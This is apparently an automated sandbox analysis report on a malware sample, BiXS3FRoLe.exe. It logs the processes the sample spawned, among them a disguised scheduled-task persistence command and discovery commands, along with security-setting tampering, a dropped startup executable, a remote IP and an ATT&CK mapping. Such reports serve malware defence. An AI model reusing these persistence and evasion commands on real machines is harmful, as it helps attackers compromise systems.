      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" Jump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.batJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\user\AppData\S-2153.bat'" /fJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfoJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /i "os name"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /vJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I /c "dcdcf" Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "BiXS3FRoLe.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "BiXS3FRoLe.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "BiXS3FRoLe.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /i "original"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I /c "dcdcf"
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A93DD0 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,DuplicateToken,AllocateAndInitializeSid,LocalAlloc,InitializeSecurityDescriptor,GetLengthSid,LocalAlloc,InitializeAcl,AddAccessAllowedAce,SetSecurityDescriptorDacl,SetSecurityDescriptorGroup,SetSecurityDescriptorOwner,IsValidSecurityDescriptor,AccessCheck,LocalFree,LocalFree,LocalFree,FreeSid,CloseHandle,CloseHandle,CloseHandle,0_2_00A93DD0
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A93DD0 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,DuplicateToken,AllocateAndInitializeSid,LocalAlloc,InitializeSecurityDescriptor,GetLengthSid,LocalAlloc,InitializeAcl,AddAccessAllowedAce,SetSecurityDescriptorDacl,SetSecurityDescriptorGroup,SetSecurityDescriptorOwner,IsValidSecurityDescriptor,AccessCheck,LocalFree,LocalFree,LocalFree,FreeSid,CloseHandle,CloseHandle,CloseHandle,0_2_00A93DD0
      Source: Xinfecter.exe, 00000030.00000002.1395053715.00000000008AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B01105 cpuid 0_2_00B01105
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: ___crtGetLocaleInfoEx,0_2_00AFC03B
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: GetLocaleInfoW,0_2_00AFC347
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_00B3E50A
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: EnumSystemLocalesW,0_2_00B3E782
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: EnumSystemLocalesW,0_2_00B3E7CD
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00B3E8F5
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: EnumSystemLocalesW,0_2_00B3E868
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: GetLocaleInfoW,0_2_00B3EB45
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: EnumSystemLocalesW,0_2_00B32C30
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00B3EC6E
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: GetLocaleInfoW,0_2_00B3ED75
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00B3EE42
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: GetLocaleInfoW,0_2_00B3311A
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: ___crtGetLocaleInfoEx,48_2_0009C03B
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: GetLocaleInfoW,48_2_0009C347
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,48_2_000DE50A
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: EnumSystemLocalesW,48_2_000DE782
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: EnumSystemLocalesW,48_2_000DE7CD
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: EnumSystemLocalesW,48_2_000DE868
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,48_2_000DE8F5
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: GetLocaleInfoW,48_2_000DEB45
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: EnumSystemLocalesW,48_2_000D2C30
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,48_2_000DEC6E
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: GetLocaleInfoW,48_2_000DED75
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,48_2_000DEE42
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: GetLocaleInfoW,48_2_000D311A
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B01BDB GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00B01BDB
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A836F0 GetUserNameW,0_2_00A836F0
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B3B462 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_00B3B462
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B06793 GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,0_2_00B06793
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Lowering of HIPS / PFW / Operating System Security Settings

      barindex
      Changes security center settings (notifications, updates, antivirus, firewall)
      Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
      Source: svchost.exe, 0000000A.00000002.2505440604.000001B89F302000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
      Source: svchost.exe, 0000000A.00000002.2505440604.000001B89F302000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A71960 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,0_2_00A71960
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A71020 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,0_2_00A71020
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00A712E0 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,0_2_00A712E0
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B12073 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_00B12073
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B12D69 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_00B12D69
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000B2073 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,48_2_000B2073
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000B2D69 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,48_2_000B2D69

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information12
      Scripting      		1
      Replication Through Removable Media      		241
      Windows Management Instrumentation      		12
      Scripting      		1
      DLL Side-Loading      		1
      Disable or Modify Tools      		OS Credential Dumping2
      System Time Discovery      		Remote Services1
      Archive Collected Data      		2
      Ingress Tool Transfer      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      Native API      		1
      DLL Side-Loading      		11
      Windows Service      		1
      Deobfuscate/Decode Files or Information      		LSASS Memory11
      Peripheral Device Discovery      		Remote Desktop ProtocolData from Removable Media2
      Encrypted Channel      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts1
      Scheduled Task/Job      		11
      Windows Service      		12
      Process Injection      		2
      Obfuscated Files or Information      		Security Account Manager1
      Account Discovery      		SMB/Windows Admin SharesData from Network Shared Drive11
      Non-Standard Port      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal Accounts1
      Service Execution      		1
      Scheduled Task/Job      		1
      Scheduled Task/Job      		1
      DLL Side-Loading      		NTDS3
      File and Directory Discovery      		Distributed Component Object ModelInput Capture2
      Non-Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchd12
      Registry Run Keys / Startup Folder      		12
      Registry Run Keys / Startup Folder      		1
      File Deletion      		LSA Secrets68
      System Information Discovery      		SSHKeylogging2
      Application Layer Protocol      		Scheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
      Masquerading      		Cached Domain Credentials1
      Network Share Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items15
      Virtualization/Sandbox Evasion      		DCSync281
      Security Software Discovery      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
      Process Injection      		Proc Filesystem15
      Virtualization/Sandbox Evasion      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
      Indicator Removal      		/etc/passwd and /etc/shadow3
      Process Discovery      		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
      System Owner/User Discovery      		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
      System Network Configuration Discovery      		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1569984 Sample: BiXS3FRoLe.exe Startdate: 06/12/2024 Architecture: WINDOWS Score: 100 87 api.ipify.org 2->87 93 Suricata IDS alerts for network traffic 2->93 95 Antivirus detection for dropped file 2->95 97 Antivirus / Scanner detection for submitted sample 2->97 99 12 other signatures 2->99 10 BiXS3FRoLe.exe 22 2->10         started        15 cmd.exe 2->15         started        17 svchost.exe 2->17         started        19 5 other processes 2->19 signatures3 process4 dnsIp5 89 185.147.34.53, 3586, 49715 HOSTSLIM-GLOBAL-NETWORKNL Iceland 10->89 91 api.ipify.org 104.26.13.205, 49709, 80 CLOUDFLARENETUS United States 10->91 79 C:\Users\user\AppData\...\Xinfecter.exe, PE32 10->79 dropped 81 C:\Windows\SysMain.sys, ASCII 10->81 dropped 83 C:\Users\user\AppData\S-8459.vbs, ASCII 10->83 dropped 85 4 other malicious files 10->85 dropped 111 Deletes shadow drive data (may be related to ransomware) 10->111 113 Drops PE files to the startup folder 10->113 115 Sample is not signed and drops a device driver 10->115 117 Contains functionality to clear event logs 10->117 21 cmd.exe 1 10->21         started        23 cmd.exe 3 2 10->23         started        25 cmd.exe 1 10->25         started        36 9 other processes 10->36 28 wscript.exe 15->28         started        30 conhost.exe 15->30         started        119 Changes security center settings (notifications, updates, antivirus, firewall) 17->119 32 MpCmdRun.exe 17->32         started        34 conhost.exe 19->34         started        file6 signatures7 process8 signatures9 38 systeminfo.exe 2 1 21->38         started        41 find.exe 1 21->41         started        43 wscript.exe 1 23->43         started        107 Uses schtasks.exe or at.exe to add and modify task schedules 25->107 45 tasklist.exe 1 25->45         started        47 findstr.exe 1 25->47         started        109 Windows Scripting host queries suspicious COM object (likely to drop second stage) 28->109 49 cmd.exe 28->49         started        51 cmd.exe 28->51         started        53 conhost.exe 32->53         started        55 6 other processes 36->55 process10 signatures11 101 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 38->101 103 Writes or reads registry keys via WMI 38->103 105 Windows Scripting host queries suspicious COM object (likely to drop second stage) 43->105 57 cmd.exe 1 43->57         started        59 cmd.exe 1 43->59         started        61 conhost.exe 49->61         started        63 tasklist.exe 49->63         started        65 find.exe 49->65         started        67 conhost.exe 51->67         started        process12 process13 69 tasklist.exe 1 57->69         started        71 conhost.exe 57->71         started        73 find.exe 57->73         started        77 12 other processes 57->77 75 conhost.exe 59->75         started       

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.